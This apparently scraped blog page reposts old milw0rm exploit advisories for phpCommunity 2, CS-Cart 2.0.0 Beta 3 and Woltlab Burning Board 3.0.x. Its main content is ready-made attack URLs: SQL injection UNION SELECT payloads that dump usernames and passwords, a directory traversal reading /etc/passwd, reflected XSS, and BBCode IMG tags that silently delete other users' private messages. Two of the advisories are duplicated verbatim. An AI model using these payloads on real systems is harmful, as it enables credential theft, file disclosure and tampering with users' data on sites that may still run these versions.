Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg= script alert('XSS'); /script
Fix
No fix.
# milw0rm
CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability
CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
Subscribe to:
Posts (Atom)
Posts
